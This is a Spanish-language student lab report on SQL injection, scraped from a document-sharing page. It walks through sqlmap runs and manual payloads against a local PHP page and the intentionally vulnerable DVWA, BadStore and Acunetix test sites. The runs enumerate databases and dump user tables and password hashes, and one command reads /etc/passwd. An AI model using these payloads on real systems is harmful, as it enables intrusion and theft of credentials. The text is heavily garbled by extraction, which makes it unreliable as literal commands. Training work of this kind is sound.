SQL Injection 2 PDF

SQL
Injection 2
Map
Índice
1. Ataque Local...................................................................
................................................................................................
...........................................3
..............3
A) Servidor de BD y Versión ..................................................................................3

B) Nombre de la BD..................................................................
...............................................................................................
....................................5
.......5
C) Tablas:..................................................................
...............................................................................................
......................................................6
.........................6
D) Columnas:................................................................
.............................................................................................
................................................7
...................7
E) Contenido de la Tabla:...................................................................
............................................................................................8
.........................8
F) Resto de Bases de Datos: ..................................................................

.....................................................................................9
...................9
G) Usuarios de MySQL: ..................................................................

.........................................................................................
....................... 10
2. DVWA ...................................................................
................................................................................................
....................................................
....................... 12
Installation
Installation..............................................................
....................................................................................................
............................................................
...................... 12
3. BadStore ...................................................................
................................................................................................
...............................................
.................. 17
A) Servidor de BD y Versión ................................................................

................................................................................
................ 17
B) Nombre de la BD..................................................................
...............................................................................................
..................................
..... 19
C) Tablas...............................................................
............................................................................................
.........................................................
............................ 20
D) Columnas .................................................................
..............................................................................................
..............................................
................. 21
E) Resto de BBDD ...............................................................

............................................................................................
........................................
........... 22
4. Acunetix................................................................
.............................................................................................
....................................................
....................... 23
A) Servidor de BD y Versión ................................................................

................................................................................
................ 23
B) Nombre de la BD..................................................................
...............................................................................................
..................................
..... 25
C) Tablas...............................................................
............................................................................................
.........................................................
............................ 26
D) Columnas .................................................................
..............................................................................................
..............................................
................. 27
Iván Martín Valderas Página 2

SQL Injection
1.Ataque
1. Ataque Local
Vamos a realizar un ataque de SQL injection a nuestra página anterior con la cual hacíamos
una consulta a nuestra base de datos de MySQL.
Su localización es: http://localhost/ejerPHP/SQL_Injection/consulta.php
Para ello utilizaremos el programa SQLMap desde la consola.
A) Servidor de BD y Versión
Primero vamos a averiguar el tipo d e servidor de Base de Datos y su versión, para ello
utilizaremos la opción –b de sqlmap:
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localho
http://localhost/ejerPHP/SQL_Injectio
st/ejerPHP/SQL_Injection/consult
n/consult
a.php?id=1 -b
sqlmap/0.9 - automatic
automatic SQL injection
injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 13 :57:25
[13:57:26] [INFO]
[INFO] using 'C:\sqlmap-0.9\s
'C:\sqlmap-0.9\sqlmap\
qlmap\output\
output\localhost\se
localhost\session'
ssion' as sessi
on file
[13:57:26] [INFO] testing connection to the target url
[13:57:26] [INFO] testing if the url is s table, wait a few seconds
[13:57:27] [INFO] url is stable
[13:57:27] [INFO] testing if GET parameter 'id' is dynamic
[13:57:27] [INFO] confirming that GET parameter 'id' is dynamic
[13:57:27] [INFO] GET parameter 'id' is dynamic
[13:57:28] [WARNING] heuristic test shows that GET parameter 'id' might not be i
njectable
[13:57:28] [INFO] testing sql injection
injection on GET parameter
parameter 'id'
[13:57:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:57:28] [INFO] GET parameter 'id' is 'AND boolean-based blind blind - WHERE or HAVI
NG clause' injectable
injectable
[13:57:28] [INFO] testing 'MySQL >= 5.0 AND error-based
error-based - WHERE or H AVING clause
'
[13:57:28] [INFO] testing 'PostgreSQL AND error-based
error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase
Server/Sybase AND error-based
error-based - WHERE o
r HAVING clause'
clause'
[13:57:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 stacke
s tacked
d queries'
[13:57:28] [INFO] testing 'PostgreSQL > 8 .1 stacked queries'
[13:57:28] [INFO]
[INFO] testing 'Microsoft SQL S erver/Sybase
erver/Sybase stacked queries'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based
time-based blind'
[13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11
5 .0.11 AND time-based blind' in
jectable
[13:57:38] [INFO] testing 'MySQL UNION query (NULL)
(NULL) - 1 to 10
1 0 columns'
[13:57:38] [INFO] target url appears to be UNION injectable
injectable with 3 columns
[13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu
mns' injectable
GET parameter
parameter 'id' is vulnerable.
vulnerable. Do you
y ou want to keep testing the others? [y/N]
Y
sqlmap identified
identified the following injection
injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind
blind - WHERE
WH ERE or HAVING clause
Payload: id=1 AND 6656=6656
Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns
columns
Payload: id=-8382 UNION
UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNU
CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS
LL(CAS
T(CHAR(71,89,68,77,83,86,116,75,108,116)
T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,1
CHAR),CHAR(32)),CHAR(58,108,107,98,5
08,107,98,5
8)), NULL,
NULL, NULL#
Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[13:57:44] [INFO] the back-end DBMS is MySQL

[13:57:44] [INFO]
[INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
banner: '5.5.8'
[13:57:44] [INFO] Fetched data logged to text fi les under 'C:\sqlmap-0.9\sqlmap\

'C:\sqlmap-0.9\sqlmap\
output\localhost'
[*] shutting down at: 13 :57:44

:57:44
En este paso el programa ha ido testeando cada una de las posibilidades para averiguar el tipo
de servidor:
[…]
'MySQL > 5.0.11

'PostgreSQL > 8.1
'Microsoft SQL Server
[…]
Tras realizar las operaciones, encontramos la versión: MySQL 5.0.11

SQL Injection
B) Nombre de la BD
Éste es el primer paso para sacar toda la información que podamos de nuestra víctima ya que a
partir de aquí iremos pasa a paso entrando más a fondo en la BD.
Sacamos el nombre de la Base

B ase de Datos a la que se refiere la consulta que hemos
he mos realizado, es
decir la base de datos actual, con el comando: --current-db
n/consult
a.php?id=1 --current-db
sqlmap/0.9 - automatic SQL injection and database takeover tool

[*] starting at: 14:01:02
[14:01:02] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi

on file
[14:01:02] [INFO] resuming injection data from session file
[14:01:02] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter:
Parameter: id id
Title: AND boolean-based blind - WHERE or HAVING clause
Type: UNION query

Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS
T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5
8)), NULL, NULL#

---

[14:01:03] [INFO] fetching current database
current database: 'asir1'

[14:01:03] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\
output\localhost'
[*] shutting down at: 14:01:03
El nombre de la Base de Datos es “asir1”

C) Tablas:
Una vez obtenido el nombre de la Base de Datos, ya podemos proceder
proceder a ver
v er las tablas que
ésta posee, mediante el comando --tables indicando –D asir1 para el nombre que hemos
obtenido antes:
C:\sqlmap-0.9\sqlmap>sqlm ap.py -u http://localho
n/consult
a.php?id=1 --tables -D asir1


on file
sts:
---
Place: GET
Parameter:
Parameter: id id
Type: UNION query

8)), NULL, NULL#

---

[14:04:49] [INFO] fetching tables for database 'asir1'
[14:04:49] [INFO] the SQL query used returns 1 entries
Database: asir1
[1 table]
+----------+
| usuarios |
+----------+
output\localhost'
Obtenemos una tabla: usuarios

SQL Injection
D) Columnas:
n/consult
a.php?id=1 --columns -T usuarios -D asir1


on file
sts:
---
Place: GET
Parameter:
Parameter: id id
Type: UNION query

8)), NULL, NULL#

---

[14:06:31] [INFO] fetching columns for table 'usuarios' on database ' asir1'
Database: asir1
Table: usuarios
[3 columns]
+--------------+-------------------------+
| Column | Type |
+--------------+-------------------------+
| id | int(10
int(10)) unsigned |
| nonmbr
nonmbre e | varcha
varchar(50)
r(50) |
| password | varcha
varchar(50)
r(50) |
+----------+-----------------------------+
output\localhost'
Hemos obtenido los nombres de las columnas y su tipo

E) Contenido de la Tabla:
C:\sqlmap-0.9\sqlmap>sqlm
ap.py -u http://localho
n/consult
a.php?id=1 --dump -T usuarios -D asir1


on file
sts:
---
Place: GET
Parameter:
Parameter: id id
Type: UNION query

8)), NULL, NULL#

---

[14:07:29] [INFO] fetching columns for table 'usuarios' on database 'asir1'
[14:07:29] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\localhost\session'
: id, int(10) unsigned, nonmbre, varchar(50), password, varchar(50)
[14:07:29] [INFO] fetching entries for table ' usuarios' on database 'asir1'
Database: asir1
Table: usuarios
[3 entries]
+----+---------+----------+
| id | nonmbre | password |
+----+---------+----------+
| 2 | ivan | ivanasir |
| 3 | luci | luciasir |
| 1 | root | asir2
asir2012
012 |
+----+---------+----------+
Ahora ya tenemos nuestra tabla usuarios de la Base de Datos asir1 completa

SQL Injection
F) Resto de Bases de Datos:
n/consult
a.php?id=1 --dbs


on file
sts:
---
Place: GET
Parameter:
Parameter: id id
Type: UNION query

8)), NULL, NULL#

---

[14:08:22] [INFO] fetching database names
available databases [8]:

[*] asir1
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
G) Usuarios de MySQL:
n/consult
a.php?id=1 --users


on file
sts:
---
Place: GET
Parameter:
Parameter: id id
Type: UNION query

8)), NULL, NULL#

---

[14:10:03] [INFO] fetching database users
database management system users [4]:
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'

SQL Injection
Sólo existe un usuario root. Aquí está uno de los problemas.

prob lemas.
Estamos utilizando el usuario root que trae por defecto MySQL para acceder por PHP.
Si estamos utilizando el usuario root para nuestras sentencias de SQL eso quiere decir que
podemos hacer llamadas al sistema:
Así podríamos saber las contraseñas usadas, por ejemplo en UNIX:

C:\sqlmap-0.9\sqlma p>sqlmap.py
ap.py -u http://localho
n/consult
a.php?id=1 --read-file /etc/passwd
2.DVWA
2. DVWA
Damn Vulnerable Web App Installation

[[La carpeta debe estar en htdocs]] Default username = admin
Default password = password
Para accede, debemos escribir en nuestro explorador:
http://127.0.0.1/dvwa/
Creamos la Base de Datos

SQL Injection
Comprobamos
Comprobamos la existencia de la vulnerabilidad:
1' or '1'='1' union select password, first_name from users where first_name='admin
ID: 1' or '1'='1' union select password,

password, first_name from users where
first_name='admin
First name: 5f4dcc3b5aa765d61d8327deb882cf99
Surname: admin
http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA

SQL Injection
Hemos obtenido una contraseña, aunque como vemos está codificada,

c odificada, vamos a utilizar una
utilidad web para decodificarla:
Probamos a sacar todas las contraseñas a la vez, ya que con el anterior código deberíamos
hacerlo 1 a 1:
1' or '1'='1' union select first_name,

first_name, password from users where '1'='1

SQL Injection
3. BadStore
Si en el campo search escribimos una comilla doble (“) nos encontramos con una r espuesta del
servidor SQL, por lo que podemos prever la vulneravilidad SQL
Al igual que con la primera práctica,

práctic a, vamos a seguir los pasos
ap.py -u "http://192.168.13.164/cgi-bin/bads
"http://192.168.13.164/cgi-bin/badstore.cgi?se
tore.cgi?se
archquery=hi&action=search&x=
archquery=hi&action=search&x=0&y=0"
0&y=0" -b

[10:02:41] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as

session file
[10:02:41] [INFO] testing if the url is stable, wait a few seconds
[10:02:42] [INFO] testing if GET parameter 'searchquery' is dynamic
[10:02:43] [WARNING] GET parameter 'searchquery' is not dynamic
[10:02:43] [INFO] heuristic test shows that GET parameter 'searchquery' might be
injectable (possible DBMS: MySQL)
[10:02:43] [INFO] testing sql injection on GET parameter 'searchquery'
[10:02:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you wan
t to skip test payloads specific for other DBMSes? [Y/n] y
[10:02:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:02:57] [INFO] target url appears to be UNION injectable with 4 columns
[10:02:57] [INFO] GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 t
o 10 columns' injectable
GET parameter 'searchquery' is vulnerable. Do you want t o keep testing the ot her
s? [y/N] y
Aquí nos ha avisado de que el parámetro ‘searchquery’

‘searchquery’ es
vulnerable, es decir, la caja de búsqueda donde antes insertamo
insertamoss
las comillas dobles (“) posee un GET que nos permitirá insertar
ahí sentencias SQL, nos pregunta además si queremos buscar
otros parámet
parámetros
ros vulnerables.
[10:03:05] [INFO] testing if GET parameter 'action' is dynamic

[10:03:05] [INFO] confirming that GET parameter 'action' is dynamic
[10:03:05] [INFO] GET parameter 'action' is dynamic
[10:03:05] [WARNING] heuristic test shows that GET parameter 'action' might not
be injectable
[10:03:05] [INFO] testing sql injection on GET parameter 'action'
'
[10:03:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:17] [WARNING] GET parameter 'action' is not injectable
[10:03:17] [INFO] testing if GET parameter 'x' is dynamic
[10:03:17] [WARNING] GET parameter 'x' is not dynamic
[10:03:17] [WARNING] heuristic test shows that GET parameter 'x' might not be in
jectable
[10:03:17] [INFO] testing sql injection on GET parameter 'x'
'
[10:03:31] [WARNING] GET parameter 'x' is not injectable
[10:03:31] [INFO] testing if GET parameter 'y' is dynamic
[10:03:31] [WARNING] GET parameter 'y' is not dynamic
[10:03:31] [WARNING] heuristic test shows that GET parameter 'y' might not be in
jectable
[10:03:31] [INFO] testing sql injection on GET parameter 'y'
'
[10:03:44] [WARNING] GET parameter 'y' is not injectable
sqlmap identified the following injection points with a total of 380 HTTP(s) req
uests:
---
Place: GET
Parameter: searchquery
Type: UNION query
Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1
18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5
8))# AND 'bYfh'='bYfh&action=search&x=0&y=0

SQL Injection
---
[10:03:45] [INFO] testing MySQL

[10:03:45] [INFO] confirming MySQL
[10:03:45] [INFO] fetching banner
web application technology: Apache 1.3.28

back-end DBMS: MySQL < 5.0.0
banner: '4.1.7-standard'

output\192.168.13.164'
B) Nombre de la BD
C:\sqlmap-0.9\sqlmap>sqlm ap.py -u "http://192.168.13.164/cgi-bin/bads
tore.cgi?se
0&y=0" --current-db


session file
[10:12:35] [INFO] resuming back-end DBMS 'mysql 4' from session file
sts:
---
Place: GET
Type: UNION query
18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5
---

back-end DBMS: MySQL 4
current database: 'badsto
'badstoredb'
redb'
output\192.168.13.164'
El nombre de la BD es badstoredb
C) Tablas
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/ba
C:\sqlmap-0.9\sqlmap>sqlmap.py "http://192.168.13.164/cgi-bin/badstore.cgi?se
dstore.cgi?se
archquery=hi&action=search&x=0&y=0" --tables -D badstoredb


session file
sts:
---
Place: GET
Type: UNION query
18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5
---

[10:20:14] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.
0
do you want to use common table existance check? [Y/n/q] y
[10:20:21] [INFO] checking table existence using items from 'C:\sqlmap-0.9\sqlma
p\txt\common-tables.txt'
[10:20:21] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[10:20:28] [WARNING] running in a single-thread mode. This could take a while.
[10:27:14] [INFO] retrieved: itemdb
Database: badstoredb
[1 table]
+--------+
| itemdb |
+--------+

output\192.168.13.164'
El nombre de la tabla es itemdb

SQL Injection
D) Columnas
tore.cgi?se
0&y=0" --columns -T itemdb -D badsto
badstoredb
redb

session file
[10:29:00] [INFO] resuming brute forced table name 'itemdb' from session file
sts:
---
Place: GET
Type: UNION query
18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5
---

[10:29:00] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.
0
do you want to use common columns existance check? [Y/n/q] y
[10:29:03] [INFO] checking column existence using items from 'C:\sqlmap-0.9\sqlm
ap\txt\common-columns.txt'
please enter number of threads? [Enter for 1 (current)]
[10:29:05] [WARNING] running in a single-thread mode. This could take a while.
[10:29:36] [INFO] retrieved: price
[10:29:55] [INFO] retrieved: qty
Database: badstoredb
Table: itemdb
[2 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| price
price | numeric
numeric |
| qty | numeric |
+--------+---------+

output\192.168.13.164'

E) Resto de BBDD
Como podemos haber visto,

visto, no hay ninguna tabla llamada usuarios ni nada por el estilo, sólo
se encuentra la tabla de los productos por lo que de esta manera no podemos sacar ni usuarios
ni contraseñas, vamos a comprobar entonces otras bases de datos:
tore.cgi?se
0&y=0" --dbs

session file
[10:36:17] [INFO] resuming brute forced table name 'itemdb' from session file
[10:36:17] [INFO] resuming brute forced column name 'price' for table 'itemdb' f
rom session file
[10:36:17] [INFO] resuming brute forced column name 'qty' for table 'itemdb' fro
m session file
sts:
---
Place: GET
Type: UNION query
18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5
---

[10:36:18] [WARNING] information_schema not available, back-end DBMS is MySQL <
5. database names will be fetched from 'mysql' database
[10:36:18] [INFO] fetching database names
[10:36:18] [INFO] fetching number of databases
[10:36:18] [ERROR] unable to retrieve the number of databases
[10:36:18] [INFO] falling back to current database
[10:36:18] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\ses
sion': badstoredb
available databases [1]:
[*] badstoredb
output\192.168.13.164'

SQL Injection
4. Acunetix
Entramos en la web y si damos unas vueltas por ella , en el apartado categories vemos que la
url nos aparece ?cat=1, es un indicio
in dicio para comprobar.
http://testphp.vulnweb.com/listproducts.php?cat=1
Vamos a sqlmap y probamos con:
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnw
http://testphp.vulnweb.com/listproducts.php?cat=1
eb.com/listproducts.php?cat=1

[10:52:49] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session

' as session file
[10:52:49] [INFO] testing if the url is stable, wait a few seconds
[10:52:50] [INFO] testing if GET parameter 'cat' is dynamic
[10:52:50] [INFO] confirming that GET parameter 'cat' is dynamic
[10:52:51] [INFO] GET parameter 'cat' is dynamic
[10:52:51] [INFO] heuristic test shows that GET parameter 'cat' might be injecta
ble (possible DBMS: MySQL)
[10:52:51] [INFO] testing sql injection on GET parameter 'cat'
[10:52:52] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
'
[10:52:52] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[10:53:52] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' i
njectable
GET parameter 'cat' is vulnerable. Do you want to keep testing the others? [y/N]
n
sqlmap identified the following injection points with a total of 29 HTTP(s) requ
ests:
---
Place: GET
Parameter: cat
Payload: cat=1 AND 4423=4423
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat=1 AND (SELECT
(S ELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10
7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F
LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Payload: cat=1 AND SLEEP(5)
---

web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake
)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
output\testphp.vulnweb.com'
El parámetro cat es vulnerable

SQL Injection
B) Nombre de la BD
C:\sqlmap-0.9\sqlmap>sqlmap.py - u http://testphp.vulnw
C:\sqlmap-0.9\sqlmap>sqlmap.py http://testphp.vulnweb.com/listproducts.php?ca
eb.com/listproducts.php?ca
t=1 --current-db


' as session file
[11:52:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
sts:
---
Place: GET
Parameter: cat
Type: error-based

---

)
[11:52:18] [INFO] retrieved: acuart
current database: 'acuart'

output\testphp.vulnweb.com'

C) Tablas
t=1 --tables -D acuart


' as session file
sts:
---
Place: GET
Parameter: cat
Type: error-based

---

)
[11:54:14] [INFO] fetching tables for database 'acuart'
[11:54:15] [INFO] retrieved: artists
[11:54:15] [INFO] retrieved: carts
[11:54:16] [INFO] retrieved: categ
[11:54:16] [INFO] retrieved: featured
[11:54:17] [INFO] retrieved: guestbook
[11:54:17] [INFO] retrieved: pictures
[11:54:18] [INFO] retrieved: users
Database: acuart
[7 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| users |
+-----------+

SQL Injection
D) Columnas
t=1 --columns -T users -D acuart


' as session file
sts:
---
Place: GET
Parameter: cat
Type: error-based

---

)
[11:56:56] [INFO] fetching columns for table 'users' on database 'acuart'
[11:56:56] [INFO] retrieved: uname
[11:56:56] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: pass
[11:56:57] [INFO] retrieved: cc
[11:56:58] [INFO] retrieved: varchar(100) Database: acuart
[11:56:58] [INFO] retrieved: address Table: users
[11:56:58] [INFO] retrieved: mediumtext [8 columns]
[11:56:58] [INFO] retrieved: email
[11:56:58] [INFO] retrieved: varchar(100) +---------+--------------+
[11:56:58] [INFO] retrieved: name | Column | Type |
[11:56:59] [INFO] retrieved: varchar(100) +---------+--------------+
[11:56:59] [INFO] retrieved: phone
| address | mediumtext |
[11:56:59] [INFO] retrieved: cart | cart | varchar(100) |
[11:56:59] [INFO] retrieved: varchar(100) | cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(10
varchar(100) 0) |
| uname | varchar(100) |
+---------+--------------+

SQL Injection 2 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

SQL Injection 2 PDF

Загружено:

Авторское право:

Доступные форматы

SQL

A) Servidor de BD y Versión ..................................................................................3

F) Resto de Bases de Datos: ..................................................................

G) Usuarios de MySQL: ..................................................................

A) Servidor de BD y Versión ................................................................

E) Resto de BBDD ...............................................................

A) Servidor de BD y Versión ................................................................

Iván Martín Valderas Página 2

Su localización es: http://localhost/ejerPHP/SQL_Injection/consulta.php

Para ello utilizaremos el programa SQLMap desde la consola.

[*] starting at: 13 :57:25

Type: UNION query

Type: AND/OR time-based blind

[13:57:44] [INFO] the back-end DBMS is MySQL

[13:57:44] [INFO] Fetched data logged to text fi les under 'C:\sqlmap-0.9\sqlmap\

[*] shutting down at: 13 :57:44

'MySQL > 5.0.11

Tras realizar las operaciones, encontramos la versión: MySQL 5.0.11

Iván Martín Valderas Página 4

Sacamos el nombre de la Base

sqlmap/0.9 - automatic SQL injection and database takeover tool

[*] starting at: 14:01:02

[14:01:02] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi

Type: UNION query

Type: AND/OR time-based blind

[14:01:03] [INFO] the back-end DBMS is MySQL

current database: 'asir1'

[*] shutting down at: 14:01:03

El nombre de la Base de Datos es “asir1”

sqlmap/0.9 - automatic SQL injection and database takeover tool

[*] starting at: 14:04:48

[14:04:48] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi

Type: UNION query

Type: AND/OR time-based blind

[14:04:49] [INFO] the back-end DBMS is MySQL

[*] shutting down at: 14:04:49

Obtenemos una tabla: usuarios

Iván Martín Valderas Página 6

sqlmap/0.9 - automatic SQL injection and database takeover tool

[*] starting at: 14:06:30

[14:06:30] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi

Type: UNION query

Type: AND/OR time-based blind

[14:06:31] [INFO] the back-end DBMS is MySQL

[*] shutting down at: 14:06:31

Hemos obtenido los nombres de las columnas y su tipo

sqlmap/0.9 - automatic SQL injection and database takeover tool

[*] starting at: 14:07:28

[14:07:28] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi

Type: UNION query

Type: AND/OR time-based blind

[14:07:28] [INFO] the back-end DBMS is MySQL

Ahora ya tenemos nuestra tabla usuarios de la Base de Datos asir1 completa

Iván Martín Valderas Página 8

F) Resto de Bases de Datos:

sqlmap/0.9 - automatic SQL injection and database takeover tool

[*] starting at: 14:08:22

[14:08:22] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi

Type: UNION query

Type: AND/OR time-based blind

[14:08:22] [INFO] the back-end DBMS is MySQL

available databases [8]:

sqlmap/0.9 - automatic SQL injection and database takeover tool